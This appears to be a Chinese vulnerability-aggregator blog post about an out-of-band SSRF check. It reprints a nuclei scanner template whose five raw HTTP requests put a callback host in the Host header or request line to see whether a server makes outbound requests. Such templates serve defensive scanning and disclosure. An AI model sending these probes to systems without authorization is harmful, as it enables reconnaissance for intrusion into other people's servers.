OOB Request Based Interaction

漏洞信息

漏洞名称: OOB Request Based Interaction

漏洞类型: 服务器端请求伪造

漏洞等级: 中危

漏洞描述: 该漏洞描述了一种基于请求的交互式服务器端请求伪造(SSRF)漏洞,攻击者可以通过构造特定的HTTP请求,诱导远程服务器获取伪造的DNS名称。这种漏洞通常出现在服务器处理外部请求时未充分验证请求的合法性,导致攻击者可以利用服务器作为代理发起对内部或外部系统的请求。

受影响产品: 该漏洞影响广泛使用HTTP协议进行通信的各类Web应用程序和服务,尤其是在处理用户提供的URL或主机名时未进行严格验证的系统。这类系统可能包括企业级Web服务、API网关、以及任何需要从外部源获取数据的应用程序。

漏洞解释: 漏洞的核心在于服务器在处理HTTP请求时,对Host头或URL中的主机名部分未进行充分的验证和过滤,导致攻击者可以通过构造恶意的Host头或URL,诱导服务器向攻击者控制的域名发起请求。这种类型的漏洞属于服务器端请求伪造(SSRF),其技术根源在于输入验证不足和对外部请求的信任过度。

影响分析: 利用此漏洞,攻击者可以绕过网络边界限制,访问内部网络资源,或通过服务器发起对其他外部系统的攻击。此外,攻击者还可能利用此漏洞进行数据泄露、服务端请求伪造攻击,甚至在某些情况下实现远程代码执行。由于这种漏洞的利用通常不需要用户交互,且可以自动化执行,因此对系统安全构成中等至严重的威胁。

来源: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/http%2Fvulnerabilities%2Fgeneric%2Frequest-based-interaction.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

id: request-based-interaction

info:
  name: OOB Request Based Interaction
  author: pdteam, NaN@korelogic
  severity: info
  description: The remote server fetched a spoofed DNS Name from the request.
  reference:
    - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
  metadata:
    max-request: 5
  tags: oast,ssrf,generic

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{interactsh-url}}
        Cache-Control: no-transform
        Accept: */*

      - |+
        GET / HTTP/1.1
        Host: @{{interactsh-url}}
        Cache-Control: no-transform
        Accept: */*

      - |+
        GET http://{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        Accept: */*

      - |+
        GET @{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        Accept: */*

      - |+
        GET {{interactsh-url}}:{{Port}}/ HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        Accept: */*

    unsafe: true # Use Unsafe HTTP library for malformed HTTP requests.

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
# digest: 4b0a00483046022100ca4916bbf7327c1cd65b48ba5243ff714d5beefa994a0069b2d40ab1b97cdd78022100d1714c05ea0264cda4eaebee4d90f3aa1786ece75107b655fc267c82080f7d20:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #服务器端请求伪造
OOB Request Based Interaction
http://example.com/2025/07/06/github_1922247109/
作者
lianccc
发布于
2025年7月6日
许可协议